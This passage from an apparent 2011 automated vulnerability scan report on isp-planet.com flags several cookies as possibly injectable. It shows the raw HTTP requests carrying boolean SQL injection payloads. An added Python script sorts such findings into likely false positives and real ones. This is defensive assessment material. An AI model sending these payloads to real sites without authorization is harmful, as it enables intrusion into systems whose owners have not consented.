<META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=658476016;u=j;z=20110218123030" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=658476016;u=j;z=20110218123030" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644262/641338/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=329052731;u=j;z=20110218123030" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=329052731;u=j;z=20110218123030" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>

</center>
</td> </TR>
<TR>
<TD width="20%" valign="TOP">
<CENTER>
&nbsp;<A href="http://www.internet.com/"><IMG src="/img/icom-logo-micro.gif" width="130" height="28" border="0" alt="Internet.com"></A><BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /about/sitemap.html?1'%20and%201%3d2--%20=1 --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641865/641338/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=1208178577;u=j;z=20110218123030" target="_blank">
<img border="0" width="125" height="125" src="http://o1.qnsr.com/cgi/x?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=120817857
...[SNIP]...

1.8. http://www.isp-planet.com/resources/directories/state_puc.html [qsg cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.isp-planet.com
Path:   /resources/directories/state_puc.html

Issue detail

The qsg cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the qsg cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
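The warning above applies with force to this report. In the paired responses shown for 1.4 through 1.8, the differences visible in the snipped bodies are the ad-server nonces (the f= and z= values in the o1.qnsr.com URLs), which change on every fetch, and the echo of the payload itself in an HTML comment. Issue 1.3 shows a different and stronger kind of evidence: a java.sql.SQLException from the JDBC driver in Response 1 that is absent from Response 2. The script below is an added example, not part of the original scan output, that triages a true/false payload pair the way a manual reviewer would: it looks for a database error signature first and otherwise compares the two bodies after stripping request-independent content. The response fragments inside it are constructed to mirror the report's HTML and are not the full captured responses; the lists of volatile tokens and error signatures are assumptions chosen for this page.

```python
"""Triage helper for difference-based SQL injection findings.

Added example; not part of the original scan report. Checks the two kinds
of evidence the report shows: a database error string in a response body
(1.3) and a "different responses" verdict for a true/false payload pair
(1.4 to 1.8). The response fragments below are constructed to mirror the
report's HTML and are not the full captured responses.
"""
import re

# Request-independent content that changes on every fetch of these pages:
# the ad-server nonce and timestamp parameters seen in the report's HTML
# (";f=<digits>" and ";z=<14-digit timestamp>"). Assumed list; extend it
# for other sites after diffing two identical baseline requests.
VOLATILE = [
    re.compile(r";f=\d+"),
    re.compile(r";z=\d{14}"),
]

# Database error signatures. The first two match the 1.3 response; the
# rest are common equivalents for other back ends (assumed list).
DB_ERRORS = [
    re.compile(r"java\.sql\.SQLException"),
    re.compile(r"\[SQLServer JDBC Driver\]"),
    re.compile(r"You have an error in your SQL syntax"),
    re.compile(r"ORA-\d{5}"),
    re.compile(r"PG::SyntaxError|pg_query\(\)"),
]


def normalize(body, payloads=()):
    """Strip volatile tokens and any echo of the payload itself."""
    for pat in VOLATILE:
        body = pat.sub("", body)
    for p in payloads:
        body = body.replace(p, "")
    return body


def db_error(body):
    """Return the first matching error signature, or None."""
    for pat in DB_ERRORS:
        m = pat.search(body)
        if m:
            return m.group(0)
    return None


def classify(body_true, body_false, payload_true, payload_false):
    """Classify a true/false payload pair.

    Returns (verdict, detail) where verdict is one of:
      "error-based"  a database error appeared in either response
      "boolean-diff" the bodies still differ after normalization
      "noise"        the bodies are identical after normalization
    """
    for body in (body_true, body_false):
        sig = db_error(body)
        if sig:
            return ("error-based", sig)
    a = normalize(body_true, [payload_true])
    b = normalize(body_false, [payload_false])
    if a == b:
        return ("noise", "identical after stripping volatile tokens and payload echo")
    return ("boolean-diff", "still differ after normalization; diff by hand")


# --- Constructed samples modeled on the report (not full responses) ---
PAYLOAD_TRUE = "1'%20and%201%3d1--%20"
PAYLOAD_FALSE = "1'%20and%201%3d2--%20"

AD = ('<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;'
      's=9538;x=3584;f={f};u=j;z={z}" target="_blank">\n')
COMMENT = ("<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com "
           "with position sitetext-1\nurl: /about/sitemap.html?{p}=1 -->\n")

# Modeled on 1.7: same page, different ad nonces, payload echoed in a comment.
RESP_TRUE = AD.format(f="1175618564", z="20110218123029") + COMMENT.format(p=PAYLOAD_TRUE)
RESP_FALSE = AD.format(f="658476016", z="20110218123030") + COMMENT.format(p=PAYLOAD_FALSE)

# Modeled on 1.3: driver error in Response 1, normal JSON in Response 2.
RESP_ERROR = ("<td>java.sql.SQLException: [Macromedia][SQLServer JDBC Driver]"
              "Invalid parameter binding(s).")
RESP_CLEAN = '{"history":true,"resp":15,"url":"vcloud_express.cfm"}'


def triage_report_samples():
    """Run the classifier over the constructed samples; returns a dict."""
    return {
        "1.3": classify(RESP_ERROR, RESP_CLEAN, "'", "''"),
        "1.7": classify(RESP_TRUE, RESP_FALSE, PAYLOAD_TRUE, PAYLOAD_FALSE),
    }


if __name__ == "__main__":
    for issue, (verdict, detail) in triage_report_samples().items():
        print(f"{issue}: {verdict} ({detail})")
```

A "noise" verdict only says that the two responses are indistinguishable once request-independent content is removed; it does not rule out blind injection, which needs a time-based or out-of-band check rather than a content diff. An "error-based" verdict still needs a look at the message: a driver error shows that the input influenced a database call, and confirming that the query structure actually changed is the manual step the report asks for.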

Request 1

GET /resources/directories/state_puc.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508'%20and%201%3d1--%20; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:26 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:24:26 GMT
Connection: close
Content-Type: text/html
Content-Length: 55371

<HTML>
<HEAD>
<TITLE>ISP Planet - Resources - State PUC Directory </TITLE>
<META NAME="description" CONTENT="information on information and resources for ISPs">
<META NAME="channel" CONTENT="ISP Resou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=459193610;u=j;z=20110218122326" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=459193610;u=j;z=20110218122326" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644262/641338/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=573923731;u=j;z=20110218122326" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=573923731;u=j;z=20110218122326" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<A HREF="/index.html"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></A><BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/directories/state_puc.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641865/641338/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=947967202;u=j;z=20110218122326" target="_blank">
<img border="0" width=
...[SNIP]...

Request 2

GET /resources/directories/state_puc.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508'%20and%201%3d2--%20; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:28 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:24:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 55381

<HTML>
<HEAD>
<TITLE>ISP Planet - Resources - State PUC Directory </TITLE>
<META NAME="description" CONTENT="information on information and resources for ISPs">
<META NAME="channel" CONTENT="ISP Resou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=396469399;u=j;z=20110218122328" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=396469399;u=j;z=20110218122328" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644262/641338/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=1188201077;u=j;z=20110218122328" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=1188201077;u=j;z=20110218122328" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<A HREF="/index.html"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></A><BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/directories/state_puc.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641865/641338/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=577855791;u=j;z=20110218122328" target="_blank">
<img border="0" widt
...[SNIP]...

1.9. http://www.isp-planet.com/services/merchants/index.html [intmintc__welcome cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.isp-planet.com
Path:   /services/merchants/index.html

Issue detail

The intmintc__welcome cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the intmintc__welcome cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/merchants/index.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome='%20and%201%3d1--%20; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:38 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:21:38 GMT
Connection: close
Content-Type: text/html
Content-Length: 56902

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - Merchant Account Providers Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldman">
<me
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695837/641639/641605/581996/581034;s=9538;x=3584;f=100210513;u=j;z=20110218122038" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695837/641639/641605/581996/581034;s=9538;x=3584;f=100210513;u=j;z=20110218122038" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644257/641639/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644257/641639/641605/581996/581034;s=9538;x=15104;f=1129950991;u=j;z=20110218122038" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644257/641639/641605/581996/581034;s=9538;x=15104;f=1129950991;u=j;z=20110218122038" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: index on path www.isp-planet.com with position sitetext-1
url: /services/merchants/index.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641824/641639/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641824/641639/641605/581996/581034;s=9538;x=153
...[SNIP]...

Request 2

GET /services/merchants/index.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome='%20and%201%3d2--%20; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:41 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:21:41 GMT
Connection: close
Content-Type: text/html
Content-Length: 56890

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - Merchant Account Providers Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldman">
<me
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695837/641639/641605/581996/581034;s=9538;x=3584;f=808902152;u=j;z=20110218122041" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695837/641639/641605/581996/581034;s=9538;x=3584;f=808902152;u=j;z=20110218122041" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644257/641639/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644257/641639/641605/581996/581034;s=9538;x=15104;f=54155068;u=j;z=20110218122041" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644257/641639/641605/581996/581034;s=9538;x=15104;f=54155068;u=j;z=20110218122041" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: index on path www.isp-planet.com with position sitetext-1
url: /services/merchants/index.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641824/641639/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641824/641639/641605/581996/581034;s=9538;x=1536;f=
...[SNIP]...

1.10. http://www.isp-planet.com/services/registrars/chart.html [qsg cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.isp-planet.com
Path:   /services/registrars/chart.html

Issue detail

The qsg cookie appears to be vulnerable to SQL injection attacks. The payloads 75422568'%20or%201%3d1--%20 and 75422568'%20or%201%3d2--%20 were each submitted in the qsg cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/registrars/chart.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=1450875422568'%20or%201%3d1--%20; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:27:17 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:28:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 85525

<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Registrar Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="ISP-Planet Staff">
<meta name="company"
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=1120555394;u=j;z=20110218122717" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=1120555394;u=j;z=20110218122717" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644256/641606/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=797076609;u=j;z=20110218122717" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=797076609;u=j;z=20110218122717" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/registrars/chart.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641817/641606/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641817/641606/641605/581996/581034;s=9538;x=1536;f=50
...[SNIP]...

Request 2

GET /services/registrars/chart.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=1450875422568'%20or%201%3d2--%20; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:27:19 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:28:19 GMT
Connection: close
Content-Type: text/html
Content-Length: 85515

<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Registrar Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="ISP-Planet Staff">
<meta name="company"
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=800695765;u=j;z=20110218122719" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=800695765;u=j;z=20110218122719" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644256/641606/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=33456387;u=j;z=20110218122719" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=33456387;u=j;z=20110218122719" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/registrars/chart.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641817/641606/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641817/641606/641605/581996/581034;s=9538;x=1536;f=118726
...[SNIP]...

1.11. http://www.isp-planet.com/services/voip_wholesalers/chart.html [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.isp-planet.com
Path:   /services/voip_wholesalers/chart.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 21473983'%20or%201%3d1--%20 and 21473983'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/voip_wholesalers/chart.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
